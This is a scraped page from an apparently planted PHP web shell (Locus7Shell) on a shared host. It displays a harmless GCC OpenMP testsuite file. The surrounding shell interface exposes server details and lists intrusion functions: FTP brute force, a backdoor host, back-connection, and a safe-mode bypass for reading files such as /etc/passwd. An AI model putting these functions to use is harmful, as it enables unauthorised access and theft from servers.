Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/g++.dg/gomp/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     linear-2.C (2.96 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// { dg-do compile }
// { dg-options "-fopenmp" }

#pragma omp declare target

int i, j;

void
f1 ()
{
  #pragma omp for linear (i:1)    // { dg-error "iteration variable .i. should not be linear" }
  for (i = 0; i < 32; i++)
    ;
}

void
f2 ()
{
  #pragma omp distribute parallel for linear (i:1)    // { dg-error ".linear. is not valid for .#pragma omp distribute parallel for." }
  for (i = 0; i < 32; i++)
    ;
}

void
f3 ()
{
  #pragma omp parallel for linear (i:1) collapse(1)
  for (i = 0; i < 32; i++)                // { dg-error "iteration variable .i. should not be linear" }
    ;
}

void
f4 ()
{
  #pragma omp for linear (i:1) linear (j:2) collapse(2)    // { dg-error "iteration variable .i. should not be linear" }
  for (i = 0; i < 32; i++)                // { dg-error "iteration variable .j. should not be linear" "" { target *-*-* } .-1 }
    for (j = 0; j < 32; j+=2)
      ;
}

void
f5 ()
{
  #pragma omp target teams distribute parallel for linear (i:1) linear (j:2) collapse(2)    // { dg-error ".linear. is not valid for .#pragma omp target teams distribute parallel for." }
  for (i = 0; i < 32; i++)
    for (j = 0; j < 32; j+=2)
      ;
}

void
f6 ()
{
  #pragma omp parallel for linear (i:1) collapse(2) linear (j:2)    // { dg-error "iteration variable .i. should not be linear" "" { target *-*-* } .+1 }
  for (i = 0; i < 32; i++)                        // { dg-error "iteration variable .j. should not be linear" }
    for (j = 0; j < 32; j+=2)
      ;
}

template <int N>
void
f7 ()
{
  #pragma omp for linear (i:1)    // { dg-error "iteration variable .i. should not be linear" }
  for (i = 0; i < 32; i++)
    ;
}

template <int N>
void
f8 ()
{
  #pragma omp distribute parallel for linear (i:1)    // { dg-error ".linear. is not valid for .#pragma omp distribute parallel for." }
  for (i = 0; i < 32; i++)
    ;
}

template <int N>
void
f9 ()
{
  #pragma omp parallel for linear (i:1) collapse(1)
  for (i = 0; i < 32; i++)                // { dg-error "iteration variable .i. should not be linear" }
    ;
}

template <int N>
void
f10 ()
{
  #pragma omp for linear (i:1) linear (j:2) collapse(2)    // { dg-error "iteration variable .i. should not be linear" }
  for (i = 0; i < 32; i++)                // { dg-error "iteration variable .j. should not be linear" "" { target *-*-* } .-1 }
    for (j = 0; j < 32; j+=2)
      ;
}

template <int N>
void
f11 ()
{
  #pragma omp target teams distribute parallel for linear (i:1) linear (j:2) collapse(2)    // { dg-error ".linear. is not valid for .#pragma omp target teams distribute parallel for." }
  for (i = 0; i < 32; i++)
    for (j = 0; j < 32; j+=2)
      ;
}

template <int N>
void
f12 ()
{
  #pragma omp parallel for linear (i:1) collapse(2) linear (j:2)    // { dg-error "iteration variable .i. should not be linear" "" { target *-*-* } .+1 }
  for (i = 0; i < 32; i++)                        // { dg-error "iteration variable .j. should not be linear" }
    for (j = 0; j < 32; j+=2)
      ;
}

#pragma omp end declare target

void
f13 ()
{
  f7 <0> ();
  #pragma omp target teams
  f8 <1> ();
  f9 <2> ();
  f10 <3> ();
  f11 <4> ();
  f12 <5> ();
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0051 ]--